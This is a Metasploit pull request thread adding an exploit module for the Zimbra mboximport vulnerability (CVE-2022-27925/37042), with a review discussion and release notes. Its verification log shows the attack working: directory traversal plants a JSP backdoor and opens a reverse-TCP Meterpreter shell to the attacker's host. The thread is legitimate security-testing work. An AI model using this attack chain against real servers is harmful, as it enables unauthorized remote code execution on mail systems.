Exploit for Zimbra mboximport (CVE-2022-27925)
rapid7/metasploit-framework pull request #16922
Opened 2022-08-19 18:19 UTC by rbowes-r7

Add a working exploit for Zimbra mboximport (CVE-2022-27925). Web request to the admin port -> RCE.

## Verification

I tested this on Zimbra Collaboration Suite *Network* Edition (trial version) version 8.8.12 (technically, the current versions (8.8.15 and 9.0.0) are vulnerable on older patches, but I couldn't figure out how to downpatch).

```
[*] Starting persistent handler(s)...
msf6 > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set RHOSTS 10.0.0.166
RHOSTS => 10.0.0.166
msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set LHOST 10.0.0.146
LHOST => 10.0.0.146
msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit

[*] Started reverse TCP handler on 10.0.0.146:4444 
[*] Encoding the payload as a .jsp file
[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/wuuvqmtko.jsp
[*] Sending POST request with ZIP file
[*] Trying to trigger the backdoor @ public/wuuvqmtko.jsp
[*] Sending stage (3020772 bytes) to 10.0.0.166
[+] Successfully triggered the payload
[+] Deleted ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/wuuvqmtko.jsp
[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.166:35180) at 2022-08-19 11:06:38 -0700

meterpreter > getuid
Server username: zimbra
```

2022-08-22 21:08 UTC, gwillcox-r7 requested changes

2022-08-22 21:31 UTC, rbowes-r7 reviewed
LGTM

2022-08-22 21:40 UTC, rbowes-r7 commented on modules/exploits/linux/http/zimbra_mboximport_cve_2022_27925.rb
> +    register_file_for_cleanup(target_filename)
I think the `zimbra_get_public_path` call should come much earlier, actually, so we can bail before ever trying to plant a file that we can't access.

Should be fixed in commit f2ff98798a

2022-08-22 21:49 UTC, rbowes-r7 commented on modules/exploits/linux/http/zimbra_mboximport_cve_2022_27925.rb
> +          'TARGET_FILENAME' => nil,
I think the `TARGET_FILENAME` line is from old code and doesn't really matter anymore - I removed it

I don't feel strongly about `TARGET_PATH`, if it's better to make it optional I'm fine with that.

2022-08-22 21:55 UTC, rbowes-r7 commented on modules/exploits/linux/http/zimbra_mboximport_cve_2022_27925.rb
> +        'DisclosureDate' => '2022-05-10',
I vaguely recall searching for a date and having trouble finding a good one.. not really sure where that one came from, though. I changed it to the Zimbra blog date, which was March 30, 2022. I also added a URL that I forgot.

https://github.com/rbowes-r7/metasploit-framework/commit/924499f566db2f94e9ef2b5b14136f6cce20820b

2022-08-22 22:11 UTC, gwillcox-r7 approved these changes

2022-08-23 16:45 UTC, gwillcox-r7 commented
Last quick rebase to clean up commit history and added in another commit at https://github.com/rapid7/metasploit-framework/pull/16922/commits/2369e1562ccaf05f08579c85de7aa185bb078c7c to document how to set up the target from scratch. Otherwise looks good, thanks @rbowes-r7 for your work on this!

2022-08-23 16:54 UTC, rbowes-r7 commented
Awesome!

2022-08-23 17:25 UTC, merged

2022-08-23 17:33 UTC, gwillcox-r7 commented
# Release Notes
Add in a module for CVE-2022-27925 and CVE-2022-37042. An attacker can exploit these issues to bypass authentication and then exploit a ZIP file path directory traversal vulnerability to gain RCE as the `zimbra` user.